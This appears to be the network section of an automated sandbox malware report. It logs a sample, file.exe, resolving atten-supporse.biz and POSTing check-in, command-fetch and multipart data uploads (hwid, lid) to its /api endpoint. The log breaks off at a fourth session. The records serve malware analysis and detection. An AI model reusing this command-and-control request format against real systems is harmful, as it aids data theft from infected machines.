Dec 10, 2024 04:31:20.307306051 CET	443	49712	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:20.307427883 CET	49712	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:20.307475090 CET	443	49712	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:20.307621002 CET	49712	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:20.307652950 CET	443	49712	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:20.307826996 CET	49712	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:20.307853937 CET	443	49712	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:20.308037996 CET	49712	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:20.308067083 CET	443	49712	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:20.308085918 CET	49712	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:20.308095932 CET	443	49712	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:20.308243036 CET	49712	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:20.308269024 CET	443	49712	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:20.308300018 CET	49712	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:20.308312893 CET	443	49712	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:20.308479071 CET	49712	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:20.308520079 CET	49712	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:20.308547974 CET	49712	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:20.355340004 CET	443	49712	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:20.355557919 CET	49712	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:20.355643034 CET	49712	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:20.355678082 CET	49712	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:20.403348923 CET	443	49712	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:26.292701960 CET	443	49712	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:26.292809010 CET	443	49712	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:26.292870045 CET	49712	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:26.293075085 CET	49712	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:26.293092966 CET	443	49712	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:26.330080986 CET	49722	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:26.330143929 CET	443	49722	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:26.330239058 CET	49722	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:26.330765963 CET	49722	443	192.168.2.5	104.21.64.1
Dec 10, 2024 04:31:26.330780029 CET	443	49722	104.21.64.1	192.168.2.5
Dec 10, 2024 04:31:26.956024885 CET	49722	443	192.168.2.5	104.21.64.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 04:31:02.986386061 CET	59033	53	192.168.2.5	1.1.1.1
Dec 10, 2024 04:31:03.309349060 CET	53	59033	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 10, 2024 04:31:02.986386061 CET	192.168.2.5	1.1.1.1	0x5a92	Standard query (0)	atten-supporse.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 10, 2024 04:31:03.309349060 CET	1.1.1.1	192.168.2.5	0x5a92	No error (0)	atten-supporse.biz	104.21.64.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 04:31:03.309349060 CET	1.1.1.1	192.168.2.5	0x5a92	No error (0)	atten-supporse.biz	104.21.80.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 04:31:03.309349060 CET	1.1.1.1	192.168.2.5	0x5a92	No error (0)	atten-supporse.biz	104.21.48.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 04:31:03.309349060 CET	1.1.1.1	192.168.2.5	0x5a92	No error (0)	atten-supporse.biz	104.21.96.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 04:31:03.309349060 CET	1.1.1.1	192.168.2.5	0x5a92	No error (0)	atten-supporse.biz	104.21.16.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 04:31:03.309349060 CET	1.1.1.1	192.168.2.5	0x5a92	No error (0)	atten-supporse.biz	104.21.32.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 04:31:03.309349060 CET	1.1.1.1	192.168.2.5	0x5a92	No error (0)	atten-supporse.biz	104.21.112.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

atten-supporse.biz

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	104.21.64.1	443	4208	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 03:31:04 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: atten-supporse.biz
2024-12-10 03:31:04 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-10 03:31:05 UTC	1019	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 03:31:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6cdrrms7r8vhf2i471utg1e71v; expires=Fri, 04-Apr-2025 21:17:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JxHztUq%2F9CqzosNKah%2FlRxHwm95sx6Tj4mY%2F6clnM1RL8nm1GiW879%2BNsQOgUEcdBTBmse1n6Wi6csNCWXwniY%2FimRWXyE0HL5gDEMv1f5dqJKYph6Tc6CHTD72LcAcpUzdd9B4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efa28f30f2a42b7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1579&rtt_var=602&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1801357&cwnd=212&unsent_bytes=0&cid=dea220e984e363cd&ts=747&x=0"
2024-12-10 03:31:05 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-10 03:31:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	104.21.64.1	443	4208	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 03:31:06 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: atten-supporse.biz
2024-12-10 03:31:06 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-10 03:31:07 UTC	1014	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 03:31:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bud4cva16j23ieub3ldq5bn5iu; expires=Fri, 04-Apr-2025 21:17:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nagUBbx6EOpueQkZgEyBQbU0SIrQG18sobjfwWsrY3vzg1Hos4Vts5kmv9PLSxQ0lZoS%2BNEfPElQQsE2PASTuAVNaX5kFGzbQHDzG7s%2BUs8JiDCL7gUk13CldDFji8KAbskHfdM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efa29006b2a1819-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1500&min_rtt=1499&rtt_var=565&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=955&delivery_rate=1933774&cwnd=215&unsent_bytes=0&cid=709d04df3e766fa6&ts=1033&x=0"
2024-12-10 03:31:07 UTC	355	IN	Data Raw: 32 35 33 37 0d 0a 68 55 53 77 62 77 2b 32 64 35 50 76 53 34 2f 71 71 77 77 67 2b 74 35 6f 55 55 62 58 4e 4c 52 75 4b 50 39 73 39 66 50 53 44 54 6a 2b 5a 73 5a 4e 4e 59 4a 62 73 5a 77 75 72 64 44 66 66 6c 57 66 38 6b 6f 77 49 76 55 4f 30 67 39 45 6a 41 6e 5a 30 61 52 67 47 72 38 69 30 51 4e 38 30 31 75 78 69 6a 4f 74 30 50 42 33 41 70 2b 77 53 6d 74 6b 73 6c 37 57 44 30 53 64 44 5a 36 63 6f 6d 46 62 37 53 6a 58 42 32 72 56 45 2f 4b 44 4a 75 71 50 7a 6d 31 4b 6c 4c 63 46 4f 53 76 31 47 4a 59 4c 55 74 31 57 31 37 36 33 65 56 6e 49 4a 63 4d 45 4c 63 74 62 36 4d 30 75 34 63 69 52 4c 6b 47 66 76 41 51 33 49 72 78 63 33 41 5a 4d 6e 41 69 66 67 37 74 72 55 4f 30 6d 31 41 5a 67 33 41 66 2f 69 53 48 68 69 63 52 74 41 74 62 38 44 53 74 6b 37 52 61 46 50 6b 6d 4d 48 Data Ascii: 2537hUSwbw+2d5PvS4/qqwwg+t5oUUbXNLRuKP9s9fPSDTj+ZsZNNYJbsZwurdDfflWf8kowIvUO0g9EjAnZ0aRgGr8i0QN801uxijOt0PB3Ap+wSmtksl7WD0SdDZ6comFb7SjXB2rVE/KDJuqPzm1KlLcFOSv1GJYLUt1W1763eVnIJcMELctb6M0u4ciRLkGfvAQ3Irxc3AZMnAifg7trUO0m1AZg3Af/iSHhicRtAtb8DStk7RaFPkmMH
2024-12-10 03:31:07 UTC	1369	IN	Data Raw: 52 58 6a 68 53 4c 6d 6a 64 74 6c 53 35 57 78 43 6a 34 75 75 6c 58 57 43 30 43 58 41 5a 32 56 76 57 4a 63 35 79 61 53 51 79 33 54 44 62 48 56 61 63 36 4e 32 57 6c 4f 6a 76 34 77 63 7a 76 37 54 35 59 4c 52 74 31 57 31 35 6d 31 62 46 6e 73 4b 64 45 46 5a 73 59 56 34 34 73 6b 36 4a 72 50 61 30 79 53 76 78 67 35 4b 72 4e 56 33 77 64 44 6d 41 6d 54 30 66 34 76 58 66 39 6d 69 6b 31 4d 32 52 37 39 68 7a 37 74 79 4e 59 67 57 39 69 37 42 6e 4e 38 39 56 4c 58 43 45 75 5a 41 4a 6d 56 76 47 6c 55 36 69 6e 55 42 32 33 54 48 2f 6d 46 4b 4f 43 44 78 6d 35 48 6c 62 67 4d 50 79 57 77 46 70 68 4d 54 59 56 4f 7a 39 47 65 61 46 6e 31 5a 4f 63 4f 59 39 6f 53 35 38 30 32 6f 35 47 4a 61 55 37 59 35 45 6f 39 49 62 70 45 31 78 35 50 6b 78 79 62 6c 4c 5a 69 57 65 6b 6d 31 77 70 67 Data Ascii: RXjhSLmjdtlS5WxCj4uulXWC0CXAZ2VvWJc5yaSQy3TDbHVac6N2WlOjv4wczv7T5YLRt1W15m1bFnsKdEFZsYV44sk6JrPa0ySvxg5KrNV3wdDmAmT0f4vXf9mik1M2R79hz7tyNYgW9i7BnN89VLXCEuZAJmVvGlU6inUB23TH/mFKOCDxm5HlbgMPyWwFphMTYVOz9GeaFn1ZOcOY9oS5802o5GJaU7Y5Eo9IbpE1x5PkxyblLZiWekm1wpg
2024-12-10 03:31:07 UTC	1369	IN	Data Raw: 30 32 6f 35 47 4a 61 55 37 59 35 45 6f 2b 4c 4c 42 54 32 51 31 41 6b 77 75 64 6e 62 68 68 57 66 55 70 31 67 31 68 33 42 2f 38 67 79 33 6c 67 63 4a 6c 52 4a 69 39 41 48 4e 71 39 56 48 4f 54 42 4c 64 4f 70 43 64 76 57 41 59 30 69 58 63 41 32 72 43 56 65 37 44 4d 4b 32 50 78 53 34 61 32 4c 41 44 4d 79 2b 2f 55 74 59 4c 52 35 67 4e 6b 4a 4b 39 61 46 44 70 49 64 59 42 5a 4e 6b 54 38 59 6f 74 36 4a 72 4d 5a 30 36 55 2f 45 52 7a 49 36 30 57 6a 6b 78 6c 6d 68 69 55 76 72 4e 2b 55 36 63 35 6e 42 51 74 30 78 6d 78 31 57 6e 71 6a 63 46 6c 52 4a 43 38 47 44 59 71 76 6c 66 63 43 6b 75 51 41 70 47 52 73 57 39 63 36 79 62 56 43 6e 2f 47 45 50 65 66 49 36 33 47 69 57 6c 61 32 4f 52 4b 42 54 53 69 52 38 42 4f 66 35 34 41 6d 5a 61 6d 4c 30 57 70 50 35 49 4b 59 5a 52 4e 73 Data Ascii: 02o5GJaU7Y5Eo+LLBT2Q1AkwudnbhhWfUp1g1h3B/8gy3lgcJlRJi9AHNq9VHOTBLdOpCdvWAY0iXcA2rCVe7DMK2PxS4a2LADMy+/UtYLR5gNkJK9aFDpIdYBZNkT8Yot6JrMZ06U/ERzI60WjkxlmhiUvrN+U6c5nBQt0xmx1WnqjcFlRJC8GDYqvlfcCkuQApGRsW9c6ybVCn/GEPefI63GiWla2ORKBTSiR8BOf54AmZamL0WpP5IKYZRNs
2024-12-10 03:31:07 UTC	1369	IN	Data Raw: 44 78 6d 56 51 6d 4c 45 4f 50 79 43 39 58 64 78 4d 42 4e 30 4a 6a 39 48 6f 4c 32 2f 71 4b 64 49 4f 65 35 51 4b 76 35 52 70 36 6f 53 4a 4e 67 4b 55 73 67 6f 38 4b 4c 6c 64 33 67 31 47 6b 77 6d 53 6d 4c 68 6e 53 4f 59 69 32 67 78 6a 32 78 54 31 69 43 7a 70 6a 38 31 6f 54 64 6a 79 53 6a 51 38 39 51 36 57 49 32 32 6f 54 4c 61 72 38 48 41 55 2f 6d 62 56 41 53 32 4d 56 66 32 4f 4a 65 57 48 7a 32 64 4f 6b 72 55 42 50 79 2b 78 57 74 38 4a 54 4a 77 4c 6b 70 43 30 59 31 44 68 4a 64 45 43 59 74 73 64 73 63 4e 70 36 70 43 4a 4e 67 4b 39 71 77 45 39 49 76 56 4a 6d 42 55 4b 6d 67 4c 58 79 66 42 6a 55 2b 45 67 31 77 46 73 30 68 33 30 68 53 33 73 6a 73 39 74 54 5a 79 35 43 7a 77 67 75 56 6a 63 44 55 75 52 42 5a 69 61 74 53 38 55 70 79 48 4b 54 54 57 55 4a 50 4b 62 50 76 Data Ascii: DxmVQmLEOPyC9XdxMBN0Jj9HoL2/qKdIOe5QKv5Rp6oSJNgKUsgo8KLld3g1GkwmSmLhnSOYi2gxj2xT1iCzpj81oTdjySjQ89Q6WI22oTLar8HAU/mbVAS2MVf2OJeWHz2dOkrUBPy+xWt8JTJwLkpC0Y1DhJdECYtsdscNp6pCJNgK9qwE9IvVJmBUKmgLXyfBjU+Eg1wFs0h30hS3sjs9tTZy5CzwguVjcDUuRBZiatS8UpyHKTTWUJPKbPv
2024-12-10 03:31:07 UTC	1369	IN	Data Raw: 41 74 62 38 44 53 74 6b 37 52 62 34 42 31 6d 4b 44 5a 6d 61 70 6e 51 61 2b 47 6a 4c 54 57 72 59 56 61 6e 4e 4b 75 61 44 7a 57 35 4f 6d 4c 67 48 4d 7a 61 36 55 64 45 46 51 59 38 45 6b 4a 61 37 5a 31 48 6f 49 4d 41 42 59 38 59 51 34 35 39 70 6f 38 6a 4f 64 67 4c 41 2f 44 77 30 4e 4b 56 56 6c 44 31 63 6e 68 69 63 6e 4c 77 76 52 61 6b 2f 6b 67 70 68 6c 45 32 78 69 79 62 6b 69 38 5a 76 53 35 53 78 44 7a 6f 68 74 46 44 53 42 6b 43 64 43 4a 47 51 74 57 56 5a 35 69 7a 62 43 6d 58 54 46 75 50 4e 5a 36 32 50 30 53 34 61 32 4a 55 4e 49 53 71 6c 46 73 6c 43 55 39 30 4a 6d 39 48 6f 4c 31 37 74 4b 64 59 4b 59 64 49 51 39 34 41 6f 34 6f 6e 4a 59 55 61 54 74 51 77 79 4b 62 42 62 30 68 35 41 6c 67 47 62 6d 4c 78 69 47 71 6c 6d 31 52 55 74 6a 46 58 41 67 43 66 6a 6a 39 38 Data Ascii: Atb8DStk7Rb4B1mKDZmapnQa+GjLTWrYVanNKuaDzW5OmLgHMza6UdEFQY8EkJa7Z1HoIMABY8YQ459po8jOdgLA/Dw0NKVVlD1cnhicnLwvRak/kgphlE2xiybki8ZvS5SxDzohtFDSBkCdCJGQtWVZ5izbCmXTFuPNZ62P0S4a2JUNISqlFslCU90Jm9HoL17tKdYKYdIQ94Ao4onJYUaTtQwyKbBb0h5AlgGbmLxiGqlm1RUtjFXAgCfjj98
2024-12-10 03:31:07 UTC	1369	IN	Data Raw: 51 63 2b 4b 62 5a 51 30 41 64 47 6a 77 65 58 6b 72 73 76 46 4b 63 68 79 6b 30 31 6c 44 62 6d 6d 79 50 71 68 4e 39 6c 51 35 75 71 42 79 4e 6b 2b 78 62 48 43 31 76 64 56 6f 47 42 70 32 68 46 71 54 2b 53 43 6d 47 55 54 62 47 4c 49 4f 75 50 7a 32 42 51 6e 62 6f 46 50 43 32 38 55 74 34 50 53 70 6b 4b 6b 4a 53 7a 59 31 48 67 4a 64 30 4a 5a 4e 6f 63 2f 73 31 6e 72 59 2f 52 4c 68 72 59 6e 52 45 77 4b 4c 67 57 79 55 4a 54 33 51 6d 62 30 65 67 76 56 75 6b 6a 30 67 64 72 30 42 44 33 68 79 7a 74 67 38 70 68 52 70 36 34 42 54 4d 76 76 46 66 51 43 55 43 57 43 4a 71 53 74 6d 6b 61 71 57 62 56 46 53 32 4d 56 64 47 57 4a 4f 47 50 69 58 45 4d 67 66 77 4e 50 32 54 74 46 74 30 41 54 70 6f 4f 6d 70 4b 34 61 6c 37 74 49 39 49 46 66 39 77 56 39 70 38 37 37 59 48 4d 59 6b 47 59 Data Ascii: Qc+KbZQ0AdGjweXkrsvFKchyk01lDbmmyPqhN9lQ5uqByNk+xbHC1vdVoGBp2hFqT+SCmGUTbGLIOuPz2BQnboFPC28Ut4PSpkKkJSzY1HgJd0JZNoc/s1nrY/RLhrYnREwKLgWyUJT3Qmb0egvVukj0gdr0BD3hyztg8phRp64BTMvvFfQCUCWCJqStmkaqWbVFS2MVdGWJOGPiXEMgfwNP2TtFt0ATpoOmpK4al7tI9IFf9wV9p877YHMYkGY
2024-12-10 03:31:07 UTC	1369	IN	Data Raw: 65 6c 56 64 6b 64 64 4e 31 57 6a 71 2f 77 5a 45 7a 67 4e 74 45 62 5a 74 6b 5a 34 4c 4e 70 74 64 79 62 50 42 44 4b 37 68 56 7a 4f 34 6f 59 6c 67 30 4b 78 54 65 4f 30 61 59 76 41 72 56 6f 6b 68 38 74 6a 46 57 32 6a 6a 76 2f 6a 73 70 34 51 64 2b 43 4e 42 51 79 76 31 48 47 43 31 32 53 54 74 6e 52 76 79 38 43 33 6d 62 62 43 6e 62 46 41 2f 79 64 4c 71 32 33 68 79 35 61 32 4f 52 4b 42 69 65 37 57 4e 45 61 57 39 41 70 67 5a 75 33 66 31 33 77 4b 5a 4a 44 4c 64 4a 56 71 64 35 6e 72 59 7a 59 4c 68 72 49 37 6c 46 6d 64 2b 49 47 68 42 4d 45 68 45 36 42 30 65 67 39 46 4b 63 30 6b 6c 55 74 6b 78 62 6a 6e 79 2f 75 6e 73 6f 70 66 4b 61 62 45 44 34 69 6f 6b 66 6f 4d 6b 32 48 41 35 47 47 6f 53 4e 50 35 43 6a 63 43 6e 75 55 57 37 47 43 61 62 57 78 69 53 59 43 70 2f 4a 4b 4b Data Ascii: elVdkddN1Wjq/wZEzgNtEbZtkZ4LNptdybPBDK7hVzO4oYlg0KxTeO0aYvArVokh8tjFW2jjv/jsp4Qd+CNBQyv1HGC12STtnRvy8C3mbbCnbFA/ydLq23hy5a2ORKBie7WNEaW9ApgZu3f13wKZJDLdJVqd5nrYzYLhrI7lFmd+IGhBMEhE6B0eg9FKc0klUtkxbjny/unsopfKabED4iokfoMk2HA5GGoSNP5CjcCnuUW7GCabWxiSYCp/JKK
2024-12-10 03:31:07 UTC	966	IN	Data Raw: 46 57 78 72 50 45 64 6d 49 38 48 6b 61 76 33 53 63 54 58 2b 55 54 62 48 4b 4b 76 2b 61 7a 32 31 55 6d 2f 73 30 44 51 4f 37 55 64 63 61 57 6f 6f 42 71 61 2b 6c 62 46 54 70 49 63 51 63 4c 5a 70 56 2f 73 31 78 31 4d 69 42 4c 6e 33 57 2f 42 4a 7a 66 50 56 6a 31 51 4a 45 6d 68 69 47 33 4a 64 68 58 65 59 77 77 68 70 69 6c 46 75 78 69 32 6d 31 32 6f 63 75 52 6f 6e 38 55 6d 4e 32 37 67 4f 46 57 78 72 50 45 64 6d 49 38 48 6b 61 76 33 53 63 54 58 2b 55 54 62 48 4b 4b 76 2b 61 7a 32 31 55 6d 2f 73 30 44 51 4f 37 55 64 63 61 57 6f 6f 42 32 4c 2b 47 54 6d 54 5a 4d 39 45 44 59 39 4d 44 34 4d 31 6e 72 59 65 4a 4e 6e 76 59 39 45 6f 4d 61 76 56 4f 6c 6c 51 4b 71 41 32 5a 6e 37 64 35 53 36 6f 42 33 41 70 73 77 67 58 6d 67 6d 62 44 76 75 67 75 44 4e 69 36 53 6d 74 32 2b 78 Data Ascii: FWxrPEdmI8Hkav3ScTX+UTbHKKv+az21Um/s0DQO7UdcaWooBqa+lbFTpIcQcLZpV/s1x1MiBLn3W/BJzfPVj1QJEmhiG3JdhXeYwwhpilFuxi2m12ocuRon8UmN27gOFWxrPEdmI8Hkav3ScTX+UTbHKKv+az21Um/s0DQO7UdcaWooB2L+GTmTZM9EDY9MD4M1nrYeJNnvY9EoMavVOllQKqA2Zn7d5S6oB3ApswgXmgmbDvuguDNi6Smt2+x
2024-12-10 03:31:07 UTC	1369	IN	Data Raw: 32 33 65 35 0d 0a 32 6f 35 47 4a 65 41 4c 41 37 30 52 7a 4e 76 55 4f 6c 6b 74 45 6b 41 2b 55 6e 37 4e 39 53 4f 45 6c 78 41 34 71 36 69 76 55 67 43 54 6f 68 73 35 51 66 4c 6d 32 47 6a 34 72 73 6d 6a 6f 4f 31 75 61 48 74 57 33 73 33 6c 5a 70 32 69 53 46 53 32 4d 56 64 43 48 4f 65 43 48 7a 69 34 4d 32 4c 68 4b 61 32 53 51 57 39 73 4a 52 4a 70 4d 74 70 75 67 59 6c 58 67 5a 70 78 4e 59 5a 52 4e 73 59 77 6a 2f 59 58 47 61 51 36 66 70 67 31 7a 61 76 56 59 6c 6c 51 4b 6e 41 53 48 6e 4c 39 6f 46 75 45 6f 33 45 31 79 6d 67 79 78 6d 32 6d 31 32 34 63 75 55 4e 6a 6b 53 6e 51 71 75 46 66 56 41 6b 6d 50 48 4a 47 53 70 6d 77 64 32 52 6a 33 41 47 44 52 47 2f 61 7a 46 38 79 43 32 57 4e 4e 6e 2f 34 71 4e 44 4b 32 61 4f 67 37 57 35 6f 65 31 62 65 7a 65 56 6d 6e 61 4a 49 56 Data Ascii: 23e52o5GJeALA70RzNvUOlktEkA+Un7N9SOElxA4q6ivUgCTohs5QfLm2Gj4rsmjoO1uaHtW3s3lZp2iSFS2MVdCHOeCHzi4M2LhKa2SQW9sJRJpMtpugYlXgZpxNYZRNsYwj/YXGaQ6fpg1zavVYllQKnASHnL9oFuEo3E1ymgyxm2m124cuUNjkSnQquFfVAkmPHJGSpmwd2Rj3AGDRG/azF8yC2WNNn/4qNDK2aOg7W5oe1bezeVmnaJIV

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	104.21.64.1	443	4208	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 03:31:09 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=P5UVSGGA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12781 Host: atten-supporse.biz
2024-12-10 03:31:09 UTC	12781	OUT	Data Raw: 2d 2d 50 35 55 56 53 47 47 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 42 43 41 34 30 45 30 36 44 36 44 45 46 43 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 50 35 55 56 53 47 47 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 35 55 56 53 47 47 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 50 35 55 56 53 47 47 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 Data Ascii: --P5UVSGGAContent-Disposition: form-data; name="hwid"42BCA40E06D6DEFC23D904AF30EFEBBC--P5UVSGGAContent-Disposition: form-data; name="pid"2--P5UVSGGAContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--P5UVSGGAContent-Di
2024-12-10 03:31:10 UTC	1022	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 03:31:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=c3ll4kgdv0t28pa6nh4p2gdpps; expires=Fri, 04-Apr-2025 21:17:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pTAEFwzjOLBW%2FniGCSYlNzP1BY14np1GuXV9XGM2cEWT90PLi%2BbBS5KbGeLak8groBEmC8pLzQFE32BqAlsG%2BOz9Rh822IMrYU6S1D2CtVdrlRGYknXoiN%2FWsSDFHvoO%2BBlU1uA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efa29104fa043f3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1847&min_rtt=1841&rtt_var=702&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2847&recv_bytes=13713&delivery_rate=1545791&cwnd=204&unsent_bytes=0&cid=3d410c0c8b8b31b1&ts=935&x=0"
2024-12-10 03:31:10 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-10 03:31:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49707	104.21.64.1	443	4208	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 03:31:11 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=42NE97KCA7D9W9VP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15071 Host: atten-supporse.biz
